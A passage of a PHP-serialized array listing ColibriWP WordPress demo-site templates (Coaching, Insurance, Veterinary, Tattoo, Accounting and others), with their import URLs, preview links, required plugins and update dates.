PRO\";s:4:\"slug\";s:13:\"home-deco-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/home-deco-pro/content.xml\";s:22:\"import_widget_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/home-deco-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:93:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/home-deco-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:79:\"https://static.colibriwp.com/templates-screenshots/home-deco-pro/screenshot.jpg\";s:11:\"preview_url\";s:50:\"https://colibriwp-work.colibriwp.com/home-deco-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-06-02 13:37:44.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:64;a:11:{s:16:\"import_file_name\";s:12:\"Coaching PRO\";s:4:\"slug\";s:14:\"coaching-pro-1\";s:10:\"categories\";a:1:{i:0;s:9:\"portfolio\";}s:15:\"import_file_url\";s:91:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/coaching-pro-1/content.xml\";s:22:\"import_widget_file_url\";s:91:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/coaching-pro-1/widgets.wie\";s:26:\"import_customizer_file_url\";s:94:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/coaching-pro-1/customizer.dat\";s:24:\"import_preview_image_url\";s:80:\"https://static.colibriwp.com/templates-screenshots/coaching-pro-1/screenshot.jpg\";s:11:\"preview_url\";s:51:\"https://colibriwp-work.colibriwp.com/coaching-pro-1\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-06-02 13:37:42.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:65;a:11:{s:16:\"import_file_name\";s:13:\"Coaching Free\";s:4:\"slug\";s:15:\"coaching-free-1\";s:10:\"categories\";a:1:{i:0;s:9:\"portfolio\";}s:15:\"import_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/coaching-free-1/content.xml\";s:22:\"import_widget_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/coaching-free-1/widgets.wie\";s:26:\"import_customizer_file_url\";s:95:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/coaching-free-1/customizer.dat\";s:24:\"import_preview_image_url\";s:81:\"https://static.colibriwp.com/templates-screenshots/coaching-free-1/screenshot.jpg\";s:11:\"preview_url\";s:50:\"https://colibriwp-work.colibriwp.com/coaching-free\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-09-14 08:01:48.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:0;}i:66;a:11:{s:16:\"import_file_name\";s:14:\"Designer Ui/Ux\";s:4:\"slug\";s:13:\"designer-uiux\";s:10:\"categories\";a:1:{i:0;s:9:\"portfolio\";}s:15:\"import_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/designer-uiux/content.xml\";s:22:\"import_widget_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/designer-uiux/widgets.wie\";s:26:\"import_customizer_file_url\";s:93:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/designer-uiux/customizer.dat\";s:24:\"import_preview_image_url\";s:79:\"https://static.colibriwp.com/templates-screenshots/designer-uiux/screenshot.jpg\";s:11:\"preview_url\";s:50:\"https://colibriwp-work.colibriwp.com/designer-uiux\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-09-25 08:33:19.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:67;a:11:{s:16:\"import_file_name\";s:9:\"Insurance\";s:4:\"slug\";s:11:\"insurance-1\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/insurance-1/content.xml\";s:22:\"import_widget_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/insurance-1/widgets.wie\";s:26:\"import_customizer_file_url\";s:91:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/insurance-1/customizer.dat\";s:24:\"import_preview_image_url\";s:77:\"https://static.colibriwp.com/templates-screenshots/insurance-1/screenshot.jpg\";s:11:\"preview_url\";s:46:\"https://colibriwp-work.colibriwp.com/insurance\";s:7:\"plugins\";a:2:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";s:37:\"mailchimp-for-wp/mailchimp-for-wp.php\";s:30:\"MC4WP: Mailchimp for WordPress\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-01-04 10:02:55.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:68;a:11:{s:16:\"import_file_name\";s:10:\"Veterinary\";s:4:\"slug\";s:12:\"veterinary-1\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/veterinary-1/content.xml\";s:22:\"import_widget_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/veterinary-1/widgets.wie\";s:26:\"import_customizer_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/veterinary-1/customizer.dat\";s:24:\"import_preview_image_url\";s:78:\"https://static.colibriwp.com/templates-screenshots/veterinary-1/screenshot.jpg\";s:11:\"preview_url\";s:47:\"https://colibriwp-work.colibriwp.com/veterinary\";s:7:\"plugins\";a:2:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";s:37:\"mailchimp-for-wp/mailchimp-for-wp.php\";s:30:\"MC4WP: Mailchimp for WordPress\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-01-19 15:56:02.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:69;a:11:{s:16:\"import_file_name\";s:8:\"Handmade\";s:4:\"slug\";s:10:\"handmade-1\";s:10:\"categories\";a:1:{i:0;s:9:\"portfolio\";}s:15:\"import_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/handmade-1/content.xml\";s:22:\"import_widget_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/handmade-1/widgets.wie\";s:26:\"import_customizer_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/handmade-1/customizer.dat\";s:24:\"import_preview_image_url\";s:76:\"https://static.colibriwp.com/templates-screenshots/handmade-1/screenshot.jpg\";s:11:\"preview_url\";s:45:\"https://colibriwp-work.colibriwp.com/handmade\";s:7:\"plugins\";a:2:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";s:37:\"mailchimp-for-wp/mailchimp-for-wp.php\";s:30:\"MC4WP: Mailchimp for WordPress\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-02-09 09:36:12.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:70;a:11:{s:16:\"import_file_name\";s:20:\"Aesthetic clinic PRO\";s:4:\"slug\";s:22:\"aesthetic-clinic-pro-1\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:99:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/aesthetic-clinic-pro-1/content.xml\";s:22:\"import_widget_file_url\";s:99:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/aesthetic-clinic-pro-1/widgets.wie\";s:26:\"import_customizer_file_url\";s:102:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/aesthetic-clinic-pro-1/customizer.dat\";s:24:\"import_preview_image_url\";s:88:\"https://static.colibriwp.com/templates-screenshots/aesthetic-clinic-pro-1/screenshot.jpg\";s:11:\"preview_url\";s:59:\"https://colibriwp-work.colibriwp.com/aesthetic-clinic-pro-1\";s:7:\"plugins\";a:2:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";s:37:\"mailchimp-for-wp/mailchimp-for-wp.php\";s:30:\"MC4WP: Mailchimp for WordPress\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-01-19 15:56:00.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:71;a:11:{s:16:\"import_file_name\";s:10:\"Tattoo PRO\";s:4:\"slug\";s:10:\"tattoo-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/tattoo-pro/content.xml\";s:22:\"import_widget_file_url\";s:87:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/tattoo-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/tattoo-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:76:\"https://static.colibriwp.com/templates-screenshots/tattoo-pro/screenshot.jpg\";s:11:\"preview_url\";s:47:\"https://colibriwp-work.colibriwp.com/tattoo-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-01-19 15:54:51.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:72;a:11:{s:16:\"import_file_name\";s:14:\"Accounting PRO\";s:4:\"slug\";s:16:\"accounting-pro-1\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:93:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/accounting-pro-1/content.xml\";s:22:\"import_widget_file_url\";s:93:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/accounting-pro-1/widgets.wie\";s:26:\"import_customizer_file_url\";s:96:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/accounting-pro-1/customizer.dat\";s:24:\"import_preview_image_url\";s:82:\"https://static.colibriwp.com/templates-screenshots/accounting-pro-1/screenshot.jpg\";s:11:\"preview_url\";s:51:\"https://colibriwp-work.colibriwp.com/accounting-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-11-06 07:32:11.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:73;a:11:{s:16:\"import_file_name\";s:14:\"Web Agency PRO\";s:4:\"slug\";s:14:\"web-agency-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:91:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/web-agency-pro/content.xml\";s:22:\"import_widget_file_url\";s:91:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/web-agency-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:94:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/web-agency-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:80:\"https://static.colibriwp.com/templates-screenshots/web-agency-pro/screenshot.jpg\";s:11:\"preview_url\";s:51:\"https://colibriwp-work.colibriwp.com/web-agency-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-10-30 09:48:41.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:74;a:11:{s:16:\"import_file_name\";s:13:\"Eldercare PRO\";s:4:\"slug\";s:13:\"eldercare-pro\";s:10:\"categories\";a:1:{i:0;s:9:\"community\";}s:15:\"import_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/eldercare-pro/content.xml\";s:22:\"import_widget_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/eldercare-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:93:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/eldercare-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:79:\"https://static.colibriwp.com/templates-screenshots/eldercare-pro/screenshot.jpg\";s:11:\"preview_url\";s:50:\"https://colibriwp-work.colibriwp.com/eldercare-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-01-19 15:54:49.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:75;a:11:{s:16:\"import_file_name\";s:20:\"Personal Stylist PRO\";s:4:\"slug\";s:20:\"personal-stylist-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:97:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/personal-stylist-pro/content.xml\";s:22:\"import_widget_file_url\";s:97:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/personal-stylist-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:100:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/personal-stylist-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:86:\"https://static.colibriwp.com/templates-screenshots/personal-stylist-pro/screenshot.jpg\";s:11:\"preview_url\";s:57:\"https://colibriwp-work.colibriwp.com/personal-stylist-pro\";s:7:\"plugins\";a:2:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";s:37:\"mailchimp-for-wp/mailchimp-for-wp.php\";s:30:\"MC4WP: Mailchimp for WordPress\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-09-24 13:40:49.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:76;a:11:{s:16:\"import_file_name\";s:15:\"Illusionist PRO\";s:4:\"slug\";s:15:\"illusionist-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/illusionist-pro/content.xml\";s:22:\"import_widget_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/illusionist-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:95:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/illusionist-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:81:\"https://static.colibriwp.com/templates-screenshots/illusionist-pro/screenshot.jpg\";s:11:\"preview_url\";s:52:\"https://colibriwp-work.colibriwp.com/illusionist-pro\";s:7:\"plugins\";a:2:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";s:37:\"mailchimp-for-wp/mailchimp-for-wp.php\";s:30:\"MC4WP: Mailchimp for WordPress\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-01-19 15:54:46.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:77;a:11:{s:16:\"import_file_name\";s:13:\"Paintball PRO\";s:4:\"slug\";s:13:\"paintball-pro\";s:10:\"categories\";a:1:{i:0;s:12:\"sport-travel\";}s:15:\"import_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/paintball-pro/content.xml\";s:22:\"import_widget_file_url\";s:90:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/paintball-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:93:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/paintball-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:79:\"https://static.colibriwp.com/templates-screenshots/paintball-pro/screenshot.jpg\";s:11:\"preview_url\";s:50:\"https://colibriwp-work.colibriwp.com/paintball-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-01-19 15:54:44.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:78;a:11:{s:16:\"import_file_name\";s:11:\"Painter PRO\";s:4:\"slug\";s:11:\"painter-pro\";s:10:\"categories\";a:1:{i:0;s:9:\"portfolio\";}s:15:\"import_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/painter-pro/content.xml\";s:22:\"import_widget_file_url\";s:88:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/painter-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:91:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/painter-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:77:\"https://static.colibriwp.com/templates-screenshots/painter-pro/screenshot.jpg\";s:11:\"preview_url\";s:48:\"https://colibriwp-work.colibriwp.com/painter-pro\";s:7:\"plugins\";a:2:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";s:37:\"mailchimp-for-wp/mailchimp-for-wp.php\";s:30:\"MC4WP: Mailchimp for WordPress\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-10-19 08:06:59.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:79;a:11:{s:16:\"import_file_name\";s:12:\"Football PRO\";s:4:\"slug\";s:12:\"football-pro\";s:10:\"categories\";a:1:{i:0;s:12:\"sport-travel\";}s:15:\"import_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/football-pro/content.xml\";s:22:\"import_widget_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/football-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/football-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:78:\"https://static.colibriwp.com/templates-screenshots/template-122/screenshot.jpg\";s:11:\"preview_url\";s:49:\"https://colibriwp-work.colibriwp.com/football-pro\";s:7:\"plugins\";a:2:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";s:37:\"mailchimp-for-wp/mailchimp-for-wp.php\";s:30:\"MC4WP: Mailchimp for WordPress\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-01-19 15:54:42.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:80;a:11:{s:16:\"import_file_name\";s:12:\"Swimming PRO\";s:4:\"slug\";s:12:\"swimming-pro\";s:10:\"categories\";a:1:{i:0;s:12:\"sport-travel\";}s:15:\"import_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/swimming-pro/content.xml\";s:22:\"import_widget_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/swimming-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:92:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/swimming-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:78:\"https://static.colibriwp.com/templates-screenshots/swimming-pro/screenshot.jpg\";s:11:\"preview_url\";s:49:\"https://colibriwp-work.colibriwp.com/swimming-pro\";s:7:\"plugins\";a:2:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";s:37:\"mailchimp-for-wp/mailchimp-for-wp.php\";s:30:\"MC4WP: Mailchimp for WordPress\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-01-19 15:54:40.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:81;a:11:{s:16:\"import_file_name\";s:16:\"Pest control PRO\";s:4:\"slug\";s:16:\"pest-control-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:93:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/pest-control-pro/content.xml\";s:22:\"import_widget_file_url\";s:93:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/pest-control-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:96:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/pest-control-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:82:\"https://static.colibriwp.com/templates-screenshots/pest-control-pro/screenshot.jpg\";s:11:\"preview_url\";s:53:\"https://colibriwp-work.colibriwp.com/pest-control-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2021-01-19 15:54:37.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:82;a:11:{s:16:\"import_file_name\";s:19:\"Coworking Space PRO\";s:4:\"slug\";s:19:\"coworking-space-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:96:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/coworking-space-pro/content.xml\";s:22:\"import_widget_file_url\";s:96:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/coworking-space-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:99:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/coworking-space-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:85:\"https://static.colibriwp.com/templates-screenshots/coworking-space-pro/screenshot.jpg\";s:11:\"preview_url\";s:56:\"https://colibriwp-work.colibriwp.com/coworking-space-pro\";s:7:\"plugins\";a:2:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";s:37:\"mailchimp-for-wp/mailchimp-for-wp.php\";s:30:\"MC4WP: Mailchimp for WordPress\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-10-21 11:27:45.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:83;a:11:{s:16:\"import_file_name\";s:9:\"Print PRO\";s:4:\"slug\";s:9:\"print-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:86:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/print-pro/content.xml\";s:22:\"import_widget_file_url\";s:86:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/print-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:89:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/print-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:75:\"https://static.colibriwp.com/templates-screenshots/print-pro/screenshot.jpg\";s:11:\"preview_url\";s:46:\"https://colibriwp-work.colibriwp.com/print-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-09-25 08:38:43.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:84;a:11:{s:16:\"import_file_name\";s:14:\"Accountant PRO\";s:4:\"slug\";s:14:\"accountant-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"services\";}s:15:\"import_file_url\";s:91:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/accountant-pro/content.xml\";s:22:\"import_widget_file_url\";s:91:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/accountant-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:94:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/accountant-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:80:\"https://static.colibriwp.com/templates-screenshots/accountant-pro/screenshot.jpg\";s:11:\"preview_url\";s:51:\"https://colibriwp-work.colibriwp.com/accountant-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-11-19 08:49:32.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:85;a:11:{s:16:\"import_file_name\";s:22:\"Marketing services PRO\";s:4:\"slug\";s:22:\"marketing-services-pro\";s:10:\"categories\";a:1:{i:0;s:8:\"business\";}s:15:\"import_file_url\";s:99:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/marketing-services-pro/content.xml\";s:22:\"import_widget_file_url\";s:99:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/marketing-services-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:102:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/marketing-services-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:88:\"https://static.colibriwp.com/templates-screenshots/marketing-services-pro/screenshot.jpg\";s:11:\"preview_url\";s:59:\"https://colibriwp-work.colibriwp.com/marketing-services-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-09-25 08:09:48.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:86;a:11:{s:16:\"import_file_name\";s:17:\"Web Developer PRO\";s:4:\"slug\";s:17:\"web-developer-pro\";s:10:\"categories\";a:1:{i:0;s:9:\"portfolio\";}s:15:\"import_file_url\";s:94:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/web-developer-pro/content.xml\";s:22:\"import_widget_file_url\";s:94:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/web-developer-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:97:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/web-developer-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:83:\"https://static.colibriwp.com/templates-screenshots/web-developer-pro/screenshot.jpg\";s:11:\"preview_url\";s:54:\"https://colibriwp-work.colibriwp.com/web-developer-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-12-15 06:17:47.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:87;a:11:{s:16:\"import_file_name\";s:24:\"Full Stack Developer PRO\";s:4:\"slug\";s:24:\"full-stack-developer-pro\";s:10:\"categories\";a:1:{i:0;s:9:\"portfolio\";}s:15:\"import_file_url\";s:101:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/full-stack-developer-pro/content.xml\";s:22:\"import_widget_file_url\";s:101:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/full-stack-developer-pro/widgets.wie\";s:26:\"import_customizer_file_url\";s:104:\"https://colibri-demo-sites.s3.us-west-2.amazonaws.com/production/full-stack-developer-pro/customizer.dat\";s:24:\"import_preview_image_url\";s:90:\"https://static.colibriwp.com/templates-screenshots/full-stack-developer-pro/screenshot.jpg\";s:11:\"preview_url\";s:61:\"https://colibriwp-work.colibriwp.com/full-stack-developer-pro\";s:7:\"plugins\";a:1:{s:36:\"contact-form-7/wp-contact-form-7.php\";s:14:\"Contact Form 7\";}s:10:\"updated_at\";a:3:{s:4:\"date\";s:26:\"2020-12-15 06:17:33.000000\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:6:\"is_pro\";i:1;}i:88;a:11:{s:16:\"import_file_name\";s:19:\"Holistic Healer 